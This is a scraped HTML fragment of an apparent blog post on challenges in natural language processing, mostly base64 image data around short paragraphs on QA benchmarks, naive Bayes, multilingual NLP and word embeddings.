Z4XK2aS40uHMTzBS6gvBaN\/O1e7pPqq0u6NIxifdMfTkkC7zoFxuEX7yv7QcmGSwZCFhD0dPdiutNyA0QG1sndITQbKT8Qxa6W6LZ7njlslwITjbsaK\/EbWywtv8ikII4pKfoQPH0r7lYtjc6JCgTLDb34ttdaehMORW1NxnGxs2tpJGyFJHhJTsQPjatd7tpTqbcc0ZnxcXMMSJ+LzbRdRe0lOMW+H2DcLbw5dxwuhp9G7aVNu+pHcUntioFi+k2sGS6dYzc7Ti1wsjCbHYFX2Eb209KypSHA646fUEpStLR8tyAkLKyyrZtpCyG3cLAcHtsiVLt2H2SK\/OkomynGLey2p+QhXNDqyEgqWlRKgo7kE7771TO6YabPt3Fp7T\/G3EXd1L9wSq1METHUq5JW8OH4igokgq3IJJqx6O2e\/wCJ47AxG4Wy8iJFjPSES7xPivy21uynlpiKEcBsJabUgJ4bpSjggFXHkch0Fhk4HhcucLnKxS0OzBEMAyVwWlOmKUlJYKinftkKI4fl8\/FWqRo5plKftS3sKs5i2WLJhwoHoWfRtIfdYdWoM8eAXzjNKCttweW3yamdKCzSsMxKdfI2TzcZtUi8Qmy1GuDsNpcllB33Sh0p5pHuV4BHyf1q4W+3QbVDZt1tiMxYsZtLTDDKAhtpCRslKUgAJSAAAB4AFVNKBSlKBSlKBSlKBSlKBSlKCDauajOaaWO3XZqHaXlXC5N27u3e6\/dsKNzbcX3XpHad7afw+P5DupaR43qRYxczfLDbbwt23OrmRW5Cl22Z6uIoqSDuy\/xT3W\/PtXxTuNjsN9qZJZrneobUe1ZNNsbzbvMvxWWHS4niRwUHkLG25CvAB3SPO24Nl0301haYWG3YrY79c5VntVujwIsSWGFBCmy4VyOaG0qLjvcHIb8BwTwQjdW4TGodJz1mNqrb9MPuxZdnY\/Mvwmd3ZKUsSYzBa4bbkqMkHffxw22O\/iY1GH8AtUjUeFqauVKFygWWVY22UlPYUw++w8pShty5hUZAGygNircHwQEbTr1gEjGpGXwWcmnWhiSuMJMPFrlJD3FKypxoNsFTrI7a93Ugo8Act1JCqprWvS16VDgpy2N3511iWSKFtLT3pUuGJkdCSU+UuMe5KvykjjvyBFRK4dKWF3SDcrdMvs9Ua73UXaZEEGAITz3ZdaUtcTsdhTiu93FOKQVF1ttROyeNdGS9IOAZKuE85kuTQXrbjULHYjkOQygsuQ3UORLiAWj\/AGxot8Ur\/LxWpJSQRsEru2uOIW+fgUSJBvlzY1CWtNqlwbRJkMpQGe6HHSlB7aFJ2IKthx3X4QlShZMC6m9O8twb+LrxKl2Z+JZ4V1uEaTbpaEp9SeCExVLaT6wF4KZSWAvk5skblSQZjM0ssq0YY3aJ0u0owZxP3ciOG1JWwIyo6mHAtKt0ltZG42UCAQfkGI5F0uaeZXg0XT++ybjLtcOw26wth4suFTcGQ3IjurSpsoWsOstlSVJLagClSClRFBf3NbtO2cLdz5+6zGbWxcUWh1C7VKEtqcp4MJjKi9vvh0uLSkI4bnmkjcEE02K6+6b5jJmRLFOvLz0GDLuDjbthnMqKIq0tym0BbI7rzLi0NuMo5OJWpKSkKO1c23QTDLVhdvwe2sx7bAt19hZC2i022Jb2zJiympKElphpLfFSmUJV45FP8wOxHw5oHjioEiCxkF8iqei5NFRJjPIbkMffc0S5Djawj2rbcADR+g\/NzJ3oKCb1M6Q26H6yXcr4ytl2Y1Ihfw5cjMjGK2w5IL8cMF1pCG5TDhUtITwcSoEg1kq5yZ33O5LxqLCnTFt9yK3JlqjsOk+RydS24pKT+oQr\/KsWYb0tYHhKb0m0z5rSL7GukZ9iPHixY7SZ7MFp7tMstJSjYW5pSfB9zjpVyKgRkvHccfsEV6E7f51yYLiDGRKbYHpGksobDLZbbQSndCl7r5K5OKHLjxSkMNQOpe8RrPiuR5jp+1BgZRkM\/H2W7NLl3mWlcVqcVrDDURK1EuwgkJSFe1wrPHiQZxB170uul2s9mtuSLlKvbcNcSSzBkKiBUtouxWnJAR2mnXWwFIbWpKyFI8e9G9RZtF8bscfFY0W43JacRvVyvkMuLQS6\/NTMS4lzZPlI9c7x22PtRuT53heH9HulGE5Vb8vtkNmZcILFta9RcrXBlySuDGRHZcbkOMl1hRbaRyDakjdPJISSokJLl3UHpbhOTvYlkF4uKbnGXHadTFsk2U227IQVR2S6y0pHdeCSltvlycUOKQpXivqN1A6YyI1hmtXS5GHkT6IcSabJNTFblOSlRER5Dxa7cZ71KFMlp0pWHBxIBI37b5oXjF+yOfksm6XNqRcLxZL26hpTYSl+1rC2Ep3QTwUU+8Ekn+UpqFP9G+n8mfbZkjI768i1XwZBFaeTFcEeX99P3ZRZUpkqYC3ZCmnC2UqcZbaSVe0lQZA071kwDVB+TGwy4zpBYiMzgqVa5URMiO6VpQ8yp9tAebKm1p5NlQBG2\/kVSOa+aSNuux15lGTJj2ld7cjqac7yIqJRhqUW+PLl6gFkI25lYKQCaueF6VWPB12ZdsnznzZMdj41H9QpB5RmVApWrike87DcjYftWP3ujrSt7MFZqZd6TOXkgyNaEyGw2oB4yhAI4bmIJxVM7e\/LvEnlx9lBKU9QOmhZuylzbyxIsy4KX4T9gnszHBNeUzEUywtkOPJddbcQlTaVAlB8+KuuUasYdh9ns16vS7sP4gIFuhx7LMfnyD2VPFPpG2lPpUltKlLCkAo2IVsdhWPMe6PMCx6NkjKb5cLm5lVst9rujt0hQZRmIiOvuIekc2P7RIWuQpS3neSyUIII2qaStGI6rRhkG3ZzkkWfhMUwol2cdZlS5jSowYc9Up5tSXVLAQ4VbA9xCT8bpIUVn6jtIMhv1sx+y5O9PeuphiLJYtUtUPnKjiRHSqV2+y2p1o7oSpYJIKduXirfmPUXjmKXjJLEuxX9b2KyrGifIXaZYirZuExmOVMvJbUl1xCXuQbTupZSUp32UU9+GdNGDYLZGcfslyu\/pGLjZ7mnvOtrWXbcyy01urh5CwwlSz8lSlcSkbASC+aR2u+5HOyB++3NkXFyzSJEVoNdsv2yYmVHcBUgrG5TwWnlsU\/ASr3UFqm9Q2l1txyJk8u43QMTVTkNxRY5qpzSYaimWp2IlovtIZUNnFLQEpKkb\/nRyoM96isR06zmyWHIu8LHd8dnZAbvFivykMtx3oqObgZbV22AiSVqfWQhISNz5rozbpT0zzy52+85BGTOmWyddZsf7xt8O4MJ+8FtLkI7MhlbY9zLRQsDmniRyIUoG+5poPiucNyWbhcbjDbk4dccJKIPZaQ3BmFnuLQntkJcT2EBGw4AEjifGwRjUzqHOAXC9Q4dhh3FVnjXp9wJmOIIXBtUaelDm7WySsSkp9hWAnirfkpSEZH1FzNrT7Dp+XSLeucmApgGOlzgVdx5DY8kEDbnv8fSohlPTdhuWzLzNn3i8srvbVxafSw40AhMy2Rbc5w3bO2zUNtSd9\/epW+42SJbk2n7OYYvdcTv+Q3KTFukpL4c4sIcjIS4hxDLZS2AUpLY8rClkE7qPjYOy\/5xYMcyCzYxcjPcuV95mK1DtsmX7EONNrccU0hQZbSp9oFaylI57k7AkReB1C6VTL7\/AA67eLhbrkpbbaGLnZpsFS0rYlPtuDvtI3aU3BllK\/yksqAO+wN2z\/Sa0ahXbHbvcrrMhv41ObnxHYbbKJCVpcbWpCZBQXW0OBsNupQpIcbUpJ+QRjKF0UaexLff4pyzJFS8jhWyFLuifSonL9G7IWH1vBnd2Q8mU82685yWtKiNx80GTcW1cwfOrYq44Zdzc0GxRcgb2jutAw5Pe9OpRWkcVKMd4FB2Wnj5A8bwrAup\/E8+xbFrvEQINxvotRmwLhHmRuz66O86hUdS4\/8AamyuM+hDg4tr7S\/xBtsZphGkVjwNvKGrZdLjJTlNykXB71SkKMVLpJ9OxxSOLKVLcUlKuRBcV5qOQ+mbC4b+MyEXm8qVi1tslri8ls\/it2tuW2wpz8PypQmuc+PEHijYJ2O4LJ1O6P5DNt8K2Xe8OruS4Xplrx24ttLamOdmK+XFshAYddPbQ8T21LBSFEg7Ti751itjlzrfcrl2pFuZt8iQgtLPBE2Q5HjHcJO\/N1lxPjfbjudhtUZtOgmK2e2QbUxdbqtqBaMaszaluN8lM2SS5IjKV7NitanCHDtsUgcQk+aqM00ag5lka8gXll7taZTNrYnxIXY7ctFvmLlxgpTjalo2cddCuCklSV7bjYGg6ZOt2IvPKasb5khjJI+MvyZUaXHjKlrkrjuIYeDCkSHG3WloKUniFJ2WtvcGqG3dSmkt2t7l1tt1uzzCRCLCBj9w7s5MtS0R1RWyyFSUqU24OTQUBwUSQBvXL3TrjEnJpuUv3y5Jkzb3br663HZjR23JEJ5bjSnA20nuqIWG1OK3cLbbY5bpKjGdR+nF2bjeKWrCbpLU9jEa02weolssOOQ4KHe0tDhjOoS\/3FNqJLfEBJ49tfFaQyCjWDDnMCtupUKPkMmy3UAxBGxye9KW2QpQWYqGS8hHFClBSkBO3E7+5O\/TkutmJY7YsRyZlq73q15pKjsWyRZrXInBTb7SnW3VBpClBBQB9N\/Px4O0f\/oNdy\/SvGtPdQblFbVY18nI1sisOW99lLbzLLDrDzPaeQhp1BG7SE95lCwhIAbEhiaOWq2YDhuAWjILpEZwYW8WyaAy5IV6VrsjuckFCubZUlWyR+YkbHbYLPfuojEYU1NnsXqp9xF8g2hQkQpEaO6ly6R7fKcjyFtdqQWHJKQsNqUArZJI33qpY6jdK5kadMg3ydIahCOtvtWiWoz2n5IisuQtmv7Y2t8pQlbPNPuSd+Kkk2K0dJWmNkvM++W6O1Hlz7yi9uymbVAamLcTdGrl2nJSGA86z32UDgtR9njclKVJpsR6OtJ8FxG4YTjVstrNunxW4Ky7j9sdecjIcDiG33TH5yNilPudKle0K35++gmatdNO27o9aZF2nRlw4IuNwkSLRLajW1oxjK4TH1NBuK6I47paeUhYSU7pHJO9rHUvpYqM2966\/okPTGoLVtdxm4ouDzrrDj7XbiFgPrStpp1QWEFP4bnndCgKCF0w43CsV+xRWbZVKseV20W+\/wAWXIYfcuSha0W0vuPraLqXSy00olCk7uNhXgFSVUV\/6fsiezDFMxt+pN1eudrujT0+5ym4iXkQY9tuEdhlppEcNK3dnLUsqTyIdcIUnihKQlVq6gtKr3drRa7TlCpRvSYhjSGoMhUVK5TRdjMuyOHbZecQN0tOKSs8kjiCtAOSAQfg71grCOjnSLA8qhZjZbezIuMUQVGTcrZBmSVPxWktJeRIcZLrKlBCFLDSkp5p5JCCTvmq0QpFttkWBLuki5Px2UNuTJCG0uyFAbFxYbSlAUo+SEpSncnYAeKCspSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlApSlArgpBO5A3rmlBwAB8ACuaUoFKUoFcfPzXNKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKBSlKD\/9k=' alt='https:\/\/www.metadialog.com\/' class='aligncenter' style='display:block;margin-left:auto;margin-right:auto;' width='405px'\/><\/figure>\n<p><\/a><\/p>\n<p><p>The model achieved state-of-the-art performance on document-level using TriviaQA and QUASAR-T datasets, and paragraph-level using SQuAD datasets. Fan et al. [41] introduced a gradient-based neural architecture search algorithm that automatically finds architecture with better performance than a transformer, conventional NMT models. If you are interested in learning more about NLP, then you have come to the right place. In this blog, we will read about how NLP works, the challenges it faces, and its real-world applications. One approach to overcome this barrier is using a variety of methods to present the case for NLP to stakeholders while employing multiple ROI metrics to track the success of existing models.<\/p>\n<\/p>\n<p><h2>Language complexity and diversity<\/h2>\n<\/p>\n<p><p>The problem with na\u00efve bayes is that we may end up with zero probabilities when we meet words in the test data for a certain class that are not present in the training data. NLP is a branch of&nbsp;Artificial Intelligence (AI)&nbsp;that understands and derives meaning from human language in a smart and useful way. It assists developers to organize and structure data to execute tasks such as automatic summarization, translation, named entity recognition, relationship extraction, sentiment analysis, speech recognition, and topic segmentation. Multilingual NLP relies on a synergy of components that work harmoniously to break down language barriers. These components are the foundation upon which the applications and advancements in Multilingual Natural Language Processing are built.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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width=\"307px\" alt=\"challenges in nlp\"\/><\/p>\n<p><p>It helps a machine to better understand human language through a distributed representation of the text in an n-dimensional space. The technique is highly used in NLP challenges \u2014 one of them being to understand the context of words. To be sufficiently trained, an AI must typically review millions of data points. Processing all those data can take lifetimes if you\u2019re using an insufficiently powered PC.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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lLT7TYDSkqtpCkpQUnnqvcTsqe1Rm\/wD4lz\/XMcQMpZmWx1x10OrYCSpMlV8xVT9NCG9NpRc8p1I0\/J+LNrdI7SV2uTzeIahJS8kh7RNuAWJue8ekcB6eh\/AUn9x9issN2c5KifGKwhpq9aT6VFUR7xHsVup\/Lojnuv8AijzArZLgFoIRxWp0+lSXUnwufxRUVx\/rTHtue\/8ANBYoSyB1isIwxAv5VPcA\/wAL+aL8jV2p15TKELQoJKrKIPzWgQsfFA\/qcN\/7cj78N\/SYcWKbGngjkXUQ3gbgQ5qF536G0LWHqglp4yjhsl09zf5X88I9hFUktnWn5O\/v6QIT7II5wm1qadZl0tNr0FRJNudoyabNGek23yjSq2lQ6XHO0YFeYWt1t0fpenRfwPW8I7gnxAawk1tBeCnA5pQgArVbe145r8fGNMRYqzHnsJl1ZlKb2ctT2grutgpT2itua1KUBf1GOg+Pn0MYBxGp6aelx8GvqLjLnZrBSgqFldNwI5AY2xy\/OYnmKaWFPzdwku3KlKc1Hfcm\/X5o750F4JFUVc2KvsTGNIFuBNje\/wCCxcXkcLMHApHoNEl5OY8xU4tIS9oeJOyLE8x4g7e6LGOMJmarxlJBpT6NfbqVbUFEi3t\/5w\/kZSV2UoQrswpTqpnQO7ewUo7XNrcrmJHZR5JSE7h2Vmq1SS\/NvNhxRU3pIGxAHzx6YmqWRhV9PSOkPhcFCSn4Jek6i5TihwsvXQGlAlO+438bbe2FanZczDD+iWeImApQQCgjuWN7+rp746KNcO+CHitxVKQw64CNSbE3MZbPDHhJybZmVstjs0oGjcayABfY7XtELa0Hisp2GjkVz8oOWVRTMuIVZD7TS1kgkhV0nu+0gW98W57AFDoQlna6JhMqGiUoTcErIFknw5mOmFL4a8IOO9vNNKcWVla0p2CuliedrDpCzirhxywr1BmqFOYQlHmZllTS13IXuDYhXQjoRa0KK8NNwFCaA8FxvmZ1jDuIWnaHUUrCFEuItqbsNlEjqLX+aOxPA1mA1j7h6o0wiYbWunOOSa2QrUZcBRKEE8xYbb+HqjkjnzkzWcjM05zBlVS4phKw\/IzJFg9LLJ0q8CRuDbqI6CeTkr6KZOYjwORpZU0HpIN3KLNEatXQKs4CD1urwjnPS9hjcVy0+pb40RDh7D7VDSnqZ9BU0MO\/11qSvsV6PpV+KFybQXJV9sJuVo0pubD54RMNgKnqko8y6L\/OqFipEinTRBOzR6x41KuUjTU0lU+GmlpShCUoB6W5nf2wqJWXLpQoLsBufWL84bck8y2+24ttKwLghQ2JjPk5\/sbNtNXBNyFK5WBvv74E6yUlsu81CLK2Vk3vGeCVDUEkCw5+Nt48qT4QJqwA0oH0jHlbRtYKIjLWnrFtSTAlAVpACRYi\/rgi8EQQJyUIqIpHq\/qPzQxIiLD3pmL9\/wC5PzRZcBKjChKsVwfGJ2+UIv6iOUWXd3E+0RdsYchV1mMKpK\/Q6j1uIzLRjT6CZdR0n0hAkusiRIEo1qA9E8\/bEb\/KlkHgkcIttiin2\/fOxJCXSfNWrDoREbPKkD\/zIHP3TU8\/6Tsdn6Dv8wSf+s+0KvxD+T6VzFlskHq3whPZ90WSK3sNYvNIrLiBfRKTDTfYOq6AJe7l\/F9Prhx+TzmH5vjeywmZl1brrtVmFrWtWpSlGUfJJJ5k9TE0PJgZbUzN7gqzYyyrKUmWxHUpiRufkLMsgtr9qVhKgehTEP8AgVw7VMH8feAsK1yWVLz9ExDPU6baUnSUPNS8whaSOhCgY9bKlW8vLY\/2dsB\/uUP8rdib3ksiBwNZfgmx7as\/7UmohD5a+ys9sCEHb6lDv\/8AVuwtcG\/lO8l+HTh5wxk9izAmNajVKIufU\/M05iVVLr7ecefTpLj6VbJdSDdI3BtfnAhbM8t0Qcq8tbEH\/pBNfyaIlcFXk8JrjAy9rWO2M228KJo9aVSDKqoZnS7Zhp3tNQfbt+m202Po3vvEh\/Kv5jUnN7hjyTzNoUhOSVPxLUX5+XYnNIebQqW2CwhSkg+wmNj+RPNuHrGw\/wD5m5\/IZWBC2lwn+Tayi4Xq21jt2tT+MsZS6FtsVOcYEtLygUCCWJZKlaVFJtqUtZ56dNzGwJ0f9N6h4mYd++Y34dkqHjGhKgNOOp0q5F50fSqOAdPP\/wCCkP8Aud7FZYd4xSiZpCFlCkEi3NMehOsj5Dn0RjPD4w2gGn5SgI8uuc66ug0WWWibZJuUq323hSlkhoXUm4I5EXjBpkmFr7dSSrokdPbCppN7WiVpceKaQrTku0+Dpuk+B2htSzXZV99ITawWOXsh16bEHw3htWKcRPXHMKP3ocQbJnNe8QIK5Vts20KeQFfvhGFUaE4wS\/J\/GN\/YkbiFCu7so\/xyPviFFYSEJ1EC4tCNCCmOpOk2O0XZKWcnZlEs1zWbH1Dxi7PTBmX1vEJbSSUpSB0HX8MLlBp5l5dM040UOOi6b80iBNSmww3LMoYbSQlAsAekUeZTMJ7B4AoV4CLlrEi9xfYwQJQSNwo78YVTdwtw+40nkqWHUSYbbUjndTiEpv6t945\/cI2SdLzrzNNbxMy+5SZFCu0ShRCnX\/RB1D16j7o6O8UGDJXH+UONMNzs25LtLp7jwcQLm7I7QD3lNojHwKy8jTKOtVPZ7NtZQlO1ydIPM9OZ2j1B0FzRDB52N8bXc+awt7CseuBdIwlb1w\/wxZf0GdRO1Obq1bVKulcpKzrw83lr87NpSNRHK6iY2RPyEnLs2k5VltsNgIDdkj6IUVu9tLOA7KWNlDmITJkPKbKbDQja946\/I8ycdwpadqRChtJAUQL9PEQqSEtLoCU2O+4hLsETCWrhSlm4J6QsSKtFlJIRY7lUQN32VoeCW5JsXCEJUfaOUKvmtmdKTvbvaecJ0i4t10OIVqG1rDnC2pan0hBToSdiTD9gFhSXuoZeUSyhksa5eUvGctKJRVsOzRR2xRda5Z2ySD6gsJUPfGqeALEb9IzZZp8+5oVUJZ2TWFLGntdJVf1k2AiZnEtKyqMn8QLfCQ2zLlwKVvbSQQfnEQ04W8OpxrmZT67hOnv9ozVRNzylgJ7BplSEpV7FBbt9\/k+uK7MzI5cu1ccxsCxwufMqmf8AntLV0Uwt+nzxBv3xv47qhWq5\/qbMW+wP3xCZhS6jOkJNu0Fr+G9oVKskmnTAH2AH0iPCZ47K0TPK9gOyBtyVfl7ouS6klZC3CQSAE\/Zb+PtjyW1FJVtblGVSJcvT7YsrSjvqUOggTgnSCezRrVdWkXHS\/qjyq0UW59krqbXMeFE9PC9+kCVUUQdtotXQlQ7RXuJjDn6t5sUoQkEnlCS\/UJiaWFE6DflAhOeUXLuBQSCopO9t7QQnYcFxMOOOkaim30wQIT2ouGHKvKedonQ1ZRTpLer8MKH1CzPL4WT\/AJj\/AIosNMVOZy7rkvRS6Ki7JTaJQsudmsPFtQQUq20nVaxvsY4iZ3v+UX4d5OlVDNzOLNWhy9addZklfV5NvdqtsJKxZuYJFgtPPxj1dk\/oyyziuCU1bVQanvaCTqdufvVJNVzMlIB2XcI4FmRuawj\/ADH\/ABRbXgF1Ruaum5\/vH\/FHFXh+a8otn819VOWebmadeo1LqTUrUHFY8mmwg3SopKXJgFQ0noD4Rtfyp2d2eGWvEXRsOYHzgxxhmR+oynPvSdJxDNyjKpgvzKVuKQ04lJWdKQVWudI3NhGynojyl9m\/M73qLts3f7F1PXlw4VBfwykad\/0j\/ij0cvXR\/wBbJ\/zH\/FHIHLLJnyp2buBKRmTgfN7MScoNbZMxJPPZmPsqdQFqSToXMhQ3SdiBEz+M3iYzN4SeFXA9JlZtf5pWIZSXpb1RmnUzq5V1phJmZgqUoh1zVYBR1C6r72EJ8kWUvs35n+9HbZu\/2KV4y+cvb4WBPh2B\/wB6PL+Xj7rRZFYSne9zL3\/\/ANRxKwFhrj24gsvcV8QGG80sZ1OjYVXMLnZh3Fkwy84tlpLzyJZrtBfQ2pKtKdI3CU3O0SQ8l5xv5s4szTayHzdxdPYnkaxKOuUmfqThenJaYaTr7NTyjqdQtIV6d1BQFja4g+SPKX2b8zvejtkvf7F0oby+daZSk1YEo3PxH\/FFMSZS4Gx9hFOCMycOU\/E1JD6Zkyk6xqZLqSSlWm53Go9Y5G+Urz+z1wFxZYhw3gbOnHeHaQzIyK2pClYjnJSWbUpkFRS204Egk7kgRM7N3H+PKb5K2k5i07G+IJTFbmBsPTi64xU326gp9wS3aOmYSoOFatStStVzqN73i7wLImBZbqTV4dDpeRYnU47eklRyVEkrdLipWZcZSZb5QUt+iZYYNpmG6fNv+cPy8g0G0OO6bayPGwAhGZ4dcjZfMQ5sy2V2H28ZecqnjWESwEyZhSSlTmofKIJufWY5seSMztzmzM4jMT0TMbNzGmKaaxgmbm2pOtV+bnmG3xPSKQ4lt5xSQsJWtIVa9lKHUww+N\/iez4yl47cXMYTzbxjKULD9TpE2zQWq9NIpykiRlHXGjLBfZFC1FZUkpsrUq4NzG4KBdY8yuHXI7OKqy1dzQy0ouJZ6SY82Yfn2StTbWoq0DcbXUT74aJ4F+EIg6eH7CX8FP440B5RfPXET\/BbhDN\/J\/Hdcw8vElWpky1PUSpvybxYelnllouNKSopuACnxTyuIyvJU5i5g5i8KONcRZg46xDiaqyuLKlLMT9Yqj85MtMppsktLaHXVKWlIUtagAQAVKI3JgQpRYi4dMjsXYQomAsUZXUOqYfw2D8EU6ZZ1Myg02+LF9ttusLeW2UuWmT1ImaBlfgumYZp05MmcflpBrs0OPlARrI8dKEj2JEcTuCXiO4hcWcVuWuHMUZ7Zh1ikz9bSzNSE\/iiemJd9HZrOlba3SlQ25EROryo\/GdjHh5o9AyyymqYp2K8TS7s\/OVJASp2QkUq7NHZhQI1uLDgCvkhpXUggQp5qIULwwJrK1yZrr1ZFbCe1WtfZ+bXtcna+r1+EcT6RgnjyxZktUOKin5qY2ew1TluLdnV4xmkzy20K0uPIR2uooSrbmDsbAgXiYnksuN7MTNzFdSyKzkxA9XZ9unGpUGrTVjMuJaKUuy7q+bqtCg4lRBNkOalHaNex\/K+GZmjZFicesNJI3ItfzEKSOZ8Ru0qeC8tXNWo1lI\/+R\/xQfmaOgbVhJ33vL8x++jj\/AOUW4hc\/MD8ZeYmFsF534\/oFFklUvzanUvEs7KyrGulyjitDTbgQm61KUbDcqJO5MTl41cfY7wr5O2RxxhfGtfpGI1yOHFqq8hUnpedUp1bAcJfQoLJUFHUb3N941T5IspH+m\/M73rI7dN3+xStTgx1psJbqCE2Ftmf54qcGOdaim\/j2X88c2fJAZxZuZnZm4\/p+ZGaeL8VSsnQpd6XZrVcmp5DKzMWKkJeWoJJG1xYxFPib4lOI+hcRWYeHsPZ\/5j02nymJZ2WlJSVxXPssMNh0hKEIS6EpSPACwh46JMpD+m\/M73pvbZu9d0jgtz\/vJP8Amv54TDls78IqqCa0E6wU6PN7\/Tqjm5lBwzeVNombOCK5jvMjHE3heRxFTJqssP5kLmWnZBEy2qYStkzJDqS2F3RY6hcWN7GnlOuOjNjC+acxkLlHimcwpT6PLNLq9RpjxanZqYdRr7NLybKbQhKk+gQSb72sID0SZTP9N+Z3vR2ybvXSaey4dn0pR8NJSQsKv2F72N7el6oTcX0FzD9OE0qbD\/aqDQSEabXB3vc+EcSsYVjjk4VjgnMbFmY2MqKcYypqlI7bEbs2mZbSG1KRMMlxQvpdaJQ4Plja97ddMqs6xxCcM2Bs13pVMrPVhCW6iyjZLc6z2jT+kXNkFaFKSCb6VJvveNZzh0a5bwnAqispYNL2tuDqcbb+UqWCqlfIGkpfoDEkthwuIbW6FG6Vm5CfVF6YrsrLullQccKdrosU+znDaUe+VWFyLExQCwsCfnjymrdOQYikyP0l75h+OKjEEkf7W9+9H44bYSL2+\/F1DBVvvCO4bJbBJucNEmqtlXjBqRmtD87RpxEupLalK1qaOnYC\/PY25REbglQ6y0zIOslDTMkFKTbvB0jvA+JHiYl3j2QqKMIsOpLsu7LVGVfl3G1lKyde426EXHvjWdKwtJUDPuuuUxDSpCbpgmEKYSAzrC9LnI+lqVc7dY9RdC8EcOCyzA7veb+jZMqWFwa\/uTmxfi13C7IelZCZm5h1Kgy20i41EWFzEccQcSWbVBmFGoZV1FxtLihrQ9qbI8eV0n2iN75iLqdFp6pyj0l2oTjp7NlABUEkm1wPedri9gLjnEZcwcVZv0WtU6lPUNAarsupcsnslPrS\/wBqlAYeU2kJZXoJWSdSRa11X1R2OM32Y1MjZfwnfgtt5d8QlCxXKM\/C8k5T6gp4S4l13KgojmSQLb7creuN2zszLNszNyEpSlskjfmgKP0REjDVIqaMX\/U9X2JCoFpxKVvSrqXDpJ2sRYkbc7AgxLyg0KWalZhmfUHEsy2sg7nShGwHrsIhLw48N1aAaBZa2xHni\/KNKlsEU1VTWhJSgpuEk7DcDfYmLWC8xc952dVU6phBSJFZSexCLFKQDvY796+56WjWWOM0KvhHzmpUTC0tJUZmd8zcnEutjs1WKruuEKKU7Hkk7kCNtZf49xWimYardUkJ1lvEsqzOMycyG1ksLFtSXWye8NroWlJIJte0TNkLW307LAqI9TrX3WZxE1pirZC12eU2615wylotrA1NkqAKT4kGErguymoWFsrKLjcl2Yq1bk1OrLndSwlbiiUhI5k2G53hyZ74YmcTYIbwvLkIXWKvJy5BSCAlRsTZPgB9EbOwbhGj5f4RkMI0FotydOYCGwSSSeZUSfEk\/PHFembHuy4fHhtPIWmU+EBzaO\/0rGhh31O5K5hFAS1Nb83BCtU\/1C9tzA++IT8JsKLMyodXB96FqaklzDCmQdOrmT7bx5kIusq6Zamzr9Q6eMZEtMuSzammk2CzqJ63\/FGRU5HzB1DQcC1KTqPTrGK2UkiCycCquuvvWvvv4xkS7kw0k6Up36KBMemUoPIRmNoSQNoRLdJD0s68sqXa\/SwsBFkyykbhN4W+zWud7BOlLaWg4sqO+5IsPmiy4UApUBspwpECLq5h9opYdvsdQFvYIIzZNkMBwG4uu8EJfyIWxcEC9KII\/tio51eW\/NsFZUWP\/WlV\/imI6K4JINJNiD8YqOdPlvv\/AELyp\/bWq\/xTEe7Oj7\/LNH\/YFrlT\/NcnF5E8A5H45URucSo3\/wDp0RF\/yyn67SnfuLp\/8pm4lD5E7+wdjn90qP5OiIveWU\/XaU\/9xdP\/AJTNxuSgUneB7j+4cMH5J5X5D1qu1hOLkoaoypdulOqa85fmlBtPa+jY9om6uQvGuPLhuLFayhaSohBla2dIOxOqT3t7zG0OBvgM4acX5F5XZ5VzB8+7jBxDdYM4mrzKUCaZmlFtfZBeiw7NPdtY9RGrfLhd6t5P2Ve0nW\/9eTgQt1+SmoqsScDVYw8h8MLqtbrUkHSnVoLrDSNVri9tV7X6QgcNHkp69w+514Zzbdzskqw3QH3HXJFFCWwX0qbUi2svq0+lfkeUOXyTlaZw3wR1LEEyw48zTK9WJ1xtq2tSW2WlkC5AuQk2hcyN8qZk\/nzmpQMp8NYAxhI1KvvLZZmJ1EsGWylClkq0OqVaySNhAhc7vKsb8Z2Jv2vp38QmN75mcavDtiXydNN4e6RjKacxxK4RolIcp6qTNJR51LhjtU9sUdmQOzXvqsbbRofyrH683E37X07+ITG3MxuAbIzCnAJT+JmmTeJ1YtmsJ0asuIdqDapPziaDHagN9kFBPxirDVttuYEJI8iwLcT+LBYbYBnR\/wDkafGnPKa3\/Px5m2v+nUv\/AGXKRuLyK6geKDFtj\/7BTv8AtCnxrfygLbL3lEcYsvtpcbcrFCQtChdKkmQkgQfVAhN1vPteJuAibyCrs6DN4SxpJ1GjpUdzIzCJlTqAOuh8qV1Px1ugif3kd\/1nOPP3Z1X\/AGVT45vcaeSc1kDxG4twMmVUzSpiYTVqOqx0OSMz8Y3pvz0EraJ+ybVaOkPkd\/1nOPP3Z1X\/AGVT4ELnTwCbcY+VP7fp\/i1xvryz7jh4n8PoLiilODZQAX2AM1NH7+8aE4B\/14uVX7fo\/i1xvjyziT+eioJsbHB0nY+P6JmYEKUuRX\/qiakepwxWd\/8A5zsQV8lo4v8APxZfd87t1e+\/P+pkzE6si9vJFVIHmML1r+OdiCfkswTxxZe26N1c\/wD4yZgQsXyn\/wCvpzN\/wqR\/siTjoRx5\/wDqxKf+12F\/9eXjnv5T8E8dGZpA5qpH+yJOOhHHmR9bFp4\/93YY\/wBeXgQo6+RH\/ss5j\/uelv5TEOuLBSUcUWZa1myU4rniT6u2MTG8iQCM2MyCemHpX+UxDniwSF8UWZaFC4ViueB\/zxgQu22RvHtw6cQWNZfLbLWuVmbrbsq7MpRMUl1hHZtJBWStW21+Xr2jmf5WfJLFWBeI6bzRcprq8NY3ZZelp5IJbE022EOsKPJK+6FgHmk3HI26dZJcC3DdkFjWXzGyzwjPUyuNSrssl52rTL6OzdACxocWUn5tukeuIfOHg5r8hUci89MwMMTDtScbkZiiOOKem2n3CA2QhoKcacBUkpVYEXve0CFFXhazh4buPfAGEMlOJuisTuOcDy\/YU6Xmp96URV09klsvtrZWgqdKW062yb3GpIIvaZ1Sy1wLlJlxTcE5c4al6FQ5SdK2ZOVKihClJWVKuokm55m5jivxocK2IuC7N2nSlBr889Q6pqqeGqu2stTTXZrGpBUm1nmiUHUkjZSVC146i8M\/EHV+JDhXw1jjFCEnEUjUV0iruoSlKZmYZQfjwkbDWlSVEbAK1WAFo0zpD\/yzV\/2fqp6X+c1PNXOAeuKX3gSbqjwur8K8hN1DbpC7Qqel5ZceSChvcC17noDCRLpuqHVRUdlIdonmpZ+cQXsnJMxeW6jILku6W0ONuLWvxQu\/4I0rgdchT6nItzks7K1O